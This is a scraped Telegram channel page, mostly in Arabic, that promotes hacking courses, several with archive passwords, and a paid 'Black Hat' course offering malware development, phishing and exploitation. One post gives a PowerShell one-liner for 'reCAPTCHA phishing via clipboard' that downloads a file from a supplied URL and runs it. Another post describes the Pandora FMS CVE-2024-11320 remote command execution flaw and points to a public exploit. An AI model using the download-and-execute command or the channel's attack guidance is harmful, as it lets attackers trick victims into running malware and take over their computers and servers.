ar
Feedback
ExploitQuest

ExploitQuest

الذهاب إلى القناة على Telegram

contact: @ExploitQuestbot

إظهار المزيد
6 808
المشتركون
لا توجد بيانات24 ساعات
+97 أيام
+12430 أيام
أرشيف المشاركات
▪️ Malware Development | Essentials 💫 التصنيف: ▪️ الفريق الأحمر ⏪ مقدم من: اكاديمية صحيح 📋 وصف الكورس: كورس Malware Develop
▪️ Malware Development | Essentials 💫 التصنيف: ▪️ الفريق الأحمر ⏪ مقدم من: اكاديمية صحيح 📋 وصف الكورس: كورس Malware Development | Essentials يركز على تعليم المبادئ الأساسية والمتقدمة لتطوير البرامج الضارة المخصصة لأنظمة تشغيل Windows. يغطي الكورس تقنيات مثل كتابة الأكواد الضارة، تجاوز برامج مكافحة الفيروسات (AV evasion)، تحليل أنظمة ويندوز، واستغلال الثغرات الأمنية لتنفيذ الهجمات. يشمل التدريب تطبيقات عملية على كيفية إنشاء برمجيات ضارة للتجسس، سرقة البيانات، أو التحكم بالنظام عن بعد. الكورس مصمم للمحترفين الذين يسعون لفهم آليات البرامج الضارة بهدف اختبار الأنظمة وتحسين أمنها. Password: @Professor_Technology تم نشرة في القناة الاساسية وفي المجتمع ❤️ 1- للوصول يجب الأنضمام هنا أولاً : أضغط هنا 2- إلى هنا ثانياً : t.me/c/2289452364/4180 ⏩⏩⏩⏩⏩⏩⏩⏩⏩⏩⏩⏩

+1
index.html0.13 KB

— Hack PC by reCAPTCHA Phishing using Clipboard —
powershell -Command Invoke-WebRequest -Uri 'Your URL' -OutFile $env:USERPROFILE\Filename; Start-Process -FilePath $env:USERPROFILE\Filename -Wait
Some People calling it HTML Exploit / PC Hacking by Link 🤡 Only For Knowledge 🦆

Repost from KILLER CODE
Password: @redbluehit @Hide01 📰 @RedBlueHit 💀👀 @RedBlueTM 🔒

Repost from KILLER CODE
Password: @redbluehit @Hide01 📰 @RedBlueHit 💀👀 @RedBlueTM 🔒

Repost from KILLER CODE

Repost from KILLER CODE
الثغرة الأمنية CVE-2024-11320 اللي بتتعلق بـ Pandora FMS تم تصنيفها كواحدة من أخطر الثغرات اللي ظهرت مؤخرًا وبتأثر على إصدارات متعددة من التطبيق ابتداءً من النسخة 700 لحد 777.4 ودي ثغرة بتنتمي لنوع Remote Command Execution واللي بتمكّن المهاجم من تنفيذ أوامر على السيرفر الهدف بدون ما يكون عنده صلاحيات مسبقة الثغرة دي جاية من وجود ثغرة في عملية مصادقة LDAP المستخدمة جوة Pandora FMS حيث إن الآلية دي مبتتحققش بشكل كافي من المدخلات اللي بيتم إدخالها وبالتالي المهاجم يقدر يحقن أوامر مباشرة في السيرفر في سياق المصادقة مع LDAP المستخدم الرئيسي للثغرة هو إن المهاجم يبعث طلبات HTTP للـ API اللي بيدعم الاتصال بـ LDAP مع إدخال سلاسل برمجية أو أوامر معينة بتتفسر كأنها أوامر نظام تشغيل بدلاً من بيانات مصادقة طبيعية الموضوع دا بيخلي المهاجم يقدر يتحكم في السيرفر الهدف بشكل كامل عملية استغلال الثغرة دي مش معقدة أوي بس بتتطلب فهم عميق للـ Pandora FMS وطريقة شغله وده اللي بيخلّيها سهلة الاستغلال للبلاك هات المحترفين الكود الاستغلالي اللي موجود في المستودع اللي اتكلمنا عنه عبارة عن سكريبت مكتوب بلغة Python واللي بيستغل API الخاص بـ Pandora FMS لحقن أوامر وتشغيلها على السيرفر من خلال إرسال سلاسل مصممة بعناية بحيث تستغل الفجوة الأمنية السكريبت بيحتاج إن المهاجم يحدد بعض البيانات الأساسية زي الـ IP الخاص بالسيرفر الهدف وبيانات المصادقة لو كانت متوفرة أو بيانات افتراضية لو السيرفر مش مفعّل أي سياسات حماية إضافية الجزء الأخطر في الثغرة دي إنها بتدي المهاجم وصول مباشر للجهاز بدون أي محاولة لتسجيل الدخول بشكل مشروع وده بيعني إن كل البيانات اللي على السيرفر بتكون في خطر المهاجم يقدر يعمل رفع ملفات تحميل برمجيات ضارة تشغيل أكواد أو حتى إيقاف السيرفر بالكامل وده بيأثر على أي نظام معتمد على Pandora FMS لإدارة الشبكات بتاعته كمرجع علمي للموضوع دا الثغرة موثقة على قاعدة بيانات الثغرات الوطنية NVD والمعلومات عنها واضحة إنها عالية الخطورة بتصنيف 9.8 على مقياس CVSS مما يعني إنها شبه حرجة لأن كل المهاجم بيحتاجه هو إرسال طلبات بشكل صحيح مع فهم طفيف للبرمجية المستخدمة عشان يحصل على تحكم كامل للمزيد من المعلومات ممكن تشوف المقالة دي اللي بتتكلم عن طبيعة الثغرة وطرق استغلالها وخطورتها على الشبكات اللي بتستخدم أنظمة Pandora FMS National Vulnerability Database CVE-2024-11320 رابط الاستغلال علي جيت هوب

+1
🚀 Maltrak | Course: In-Depth Red Teaming: APT Adversary Simulation 💎 لغة الكورس :- أنجليزي
⬅️ شارك هذه الدورة مع أصدقائك وانضم إلى المجلد لرحلة تعليمية متكاملة 🏆
#الامن_السيبراني #كورسات

I found Open Redirect on a government website gov
I found Open Redirect on a government website gov

My first vulnerability in NASA: A Local File Inclusion (LFI) vulnerability has been discovered. A Local File Inclusion (LFI/D
My first vulnerability in NASA: A Local File Inclusion (LFI) vulnerability has been discovered. A Local File Inclusion (LFI/Directory Traversal) vulnerability has been identified on NASA.GOV. This vulnerability allows attackers to exploit insecure file path injection to access sensitive files. On the NASA system https://x.com/Mr_Dark55/status/1866978916302278931?t=-QcBL7_6M9Ui7gnLtPlB1A&s=19

بدا البث

+1
🚀 Maltrak | Course: In-Depth Red Teaming: APT Adversary Simulation 💎 لغة الكورس :- أنجليزي
⬅️ شارك هذه الدورة مع أصدقائك وانضم إلى المجلد لرحلة تعليمية متكاملة 🏆
#الامن_السيبراني #كورسات

🐈‍⬛ Maltrak | Course: In-Depth Red Teaming: APT Adversary Simulation 😏 ملخص محتوى دورة "In-Depth Red Teaming: APT Adversary
🐈‍⬛ Maltrak | Course: In-Depth Red Teaming: APT Adversary Simulation 😏 ملخص محتوى دورة "In-Depth Red Teaming: APT Adversary Simulation" 🎁 الهدف: تهدف الدورة إلى تعليم محاكاة هجمات التهديدات المستمرة المتقدمة (APT) بأسلوب فرق Red Teaming. تُغطي الدورة مراحل هجوم APT، من الاستطلاع إلى إخفاء الأدلة، مرورًا بتقنيات التصيد، البرامج الضارة، استغلال الثغرات، والحفاظ على الوصول. تستخدم أدوات مثل Metasploit و Cobalt Strike. تستهدف الدورة مختبري الاختراق ومحللي الأمن، وتهدف إلى إكسابهم مهارات تخطيط وتنفيذ وتقييم محاكاة APT وكتابة التقارير وفهم أخلاقيات المجال. 💎 الجمهور المستهدف: 🟣 مختبرو اختراق 🟣 محللو الأمن السيبراني 🟣 أعضاء فرق Red Team 🟣 أي شخص مهتم بفهم كيفية عمل هجمات APT 🧪 المهارات المكتسبة: 🟣القدرة على تخطيط وتنفيذ وتقييم عمليات محاكاة APT واقعية. 🟣 فهم عميق لتقنيات وأدوات APT. 🟣 القدرة على استخدام أدوات القرصنة الأخلاقية واختبار الاختراق. 🟣 القدرة على كتابة تقارير مفصلة حول نتائج عمليات محاكاة APT. 🟣 فهم المسؤوليات الأخلاقية والقانونية لفرق Red Teaming. 🎁 ملاحظة: هذه الدورة مخصصة للمهنيين ذوي الخبرة في مجال الأمن السيبراني. Info : https://access.maltrak.com/courses/in-depth-red-teaming-apt-adversary-simulation 💎 لغة الكورس :- أنجليزي
⬅️ شارك هذه الدورة مع أصدقائك وانضم إلى المجلد لرحلة تعليمية متكاملة 🏆
#الامن_السيبراني #كورسات

Repost from KILLER CODE
"لو نفسك تدخل عالم البلاك هات من أوسع أبوابه وتتعلم كل الأساليب الخاصة بيهم في المجال، الفرصة قدامك دلوقتي! 👍 بقدم ليك دورة Black Hat ⬆️ اللي هتوسع مداركك 💪 في المجال الدورة دي هتكون مكثفة ، وهتركز على المجالات التالية : تطوير المالوير (Malware Development 🦠) : في الجزء ده هتتعلم إزاي تصمم برمجيات خبيثة باحترافية باستخدام تقنيات متطورة. هتعرف إزاي تبني برامج قادرة على التهرب من برامج الحماية (Antivirus Evasion) وتحقيق السيطرة الكاملة على الأجهزة المستهدفة. هتتعلم تقنيات مثل الـPayload Engineering والـObfuscation وكتابة برمجيات متقدمة بلغة Assembly أو C++، بالإضافة إلى إنشاء فيروسات متطورة قادرة على التسلل للشبكات أو سرقة البيانات. صناعة الـ Exploits ⭐️: ده الجزء اللي هيحولك من مجرد هاكر مبتدئ لمتخصص قادر على استغلال الثغرات الأمنية باحتراف. هتعرف إزاي تكتشف الثغرات بنفسك، سواء كانت في البرمجيات أو الأنظمة، وتبني أدوات خاصة بيك لاستغلالها. هتتعلم Buffer Overflow، Format String Vulnerabilities، واستخدام أدوات مثل GDB وImmunity Debugger لتحليل التطبيقات واستخراج نقاط الضعف. 🔴Binary Exploitation: لو عايز تدخل لعالم الهندسة العكسية وتحليل البرمجيات من أوسع أبوابه، الجزء ده هيكون محطة أساسية. هتتعلم قراءة وتحليل الأكواد الثابتة والديناميكية، اكتشاف الثغرات في البرامج عن طريق تفكيك الملفات التنفيذية (Disassembling)، وكمان كتابة أكواد لاستغلالها بشكل احترافي. بالإضافة إلى فهم عميق لبنية البرامج وكيفية التعامل مع أنظمة التشغيل بطرق جديدة. أساليب التصيد (Phishing)⚠️: هنا هتتعلم واحدة من أخطر تقنيات الهجوم اللي بيستخدمها البلاك هات. هتكتشف إزاي تصمم صفحات وهمية (Fake Pages) مثالية لجذب الضحايا، كتابة رسائل بريد إلكتروني احترافية تخدع المستلمين، واستخدام تقنيات الهندسة الاجتماعية لإقناع الهدف بالتفاعل مع الهجمة. ده هيخليك قادر تستهدف الأفراد أو المؤسسات بشكل مباشر وبأعلى فرص نجاح. استغلال الثغرات 💀: ده الجزء اللي هيحولك لماكينة استغلال لا تتوقف. هتتعلم أكتر من ألف طريقة لاختراق أي نظام أو تطبيق باستخدام تقنيات زي SQL Injection، XSS، LFI/RFI، وغيرها. هتتعرف على كيفية استخدام أدوات متقدمة زي Burp Suite وMetasploit، وتحويل الثغرات العادية لهجمات معقدة ومؤثرة. اختراق المواقع: في النهاية، الجزء ده هيركز على فهم الأنظمة المدمجة في المواقع وكيفية تحليلها لاكتشاف نقاط الضعف. هتتعلم إزاي تستغل البنية التحتية للمواقع، تكسر الحمايات زي WAF و غيرها كتير وتحقق السيطرة على السيرفرات المستضيفة. هتستخدم تقنيات زي Web Shells، وهتتعلم إزاي تهاجم المواقع وتستغلها لصالحك و المزيد 💀♾ الهندسة العكسية (Reverse Engineering): هنا هتتعلم إزاي تفكك البرامج خطوة بخطوة علشان تعرف هي شغالة إزاي من جوه. هتفهم تفاصيل الكود وتعرف تطلع منه ثغرات أو حتى تصمم نسخ معدّلة (Cracked Versions) للبرامج الجزء ده بيجمع بين المهارات التقنية والتحليلية وهيديك الأدوات اللي تخليك قادر تفهم أي برنامج مهما كان معقد وتوظفه لصالحك كل جزء هيكون مليان بتطبيقات عملية علشان تتأكد إنك مش بس فاهم، لكن كمان قادر تنفذ فعلياً! وكمان الدورة هتعلمك إزاي تبني أدواتك 🥇 الخاصة وتتعامل مع أقوى أدوات البلاك هات علشان تكون جاهز لأي تحدي 💥 المحتوى معمول بعناية ⭐️ و متعوب جدا عليه وصدقني ده مش مجرد كورس ⭐️، دي تجربة كاملة هتغير مسار مستقبلك للأفضل 💀🥇 الدورة مش رخيصة🤕! لو فعلاً مستعد تستثمر 💰 في نفسك، ده الكورس اللي يستاهل كل دولار 💰هتصرفه عليه لو أنت جاد وعايز تبدأ، كلمنا فوراً على @EIPDZG 🎩🪟 الفرصة مش هتستناك كتير، مستني إيه؟ 🔥"

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.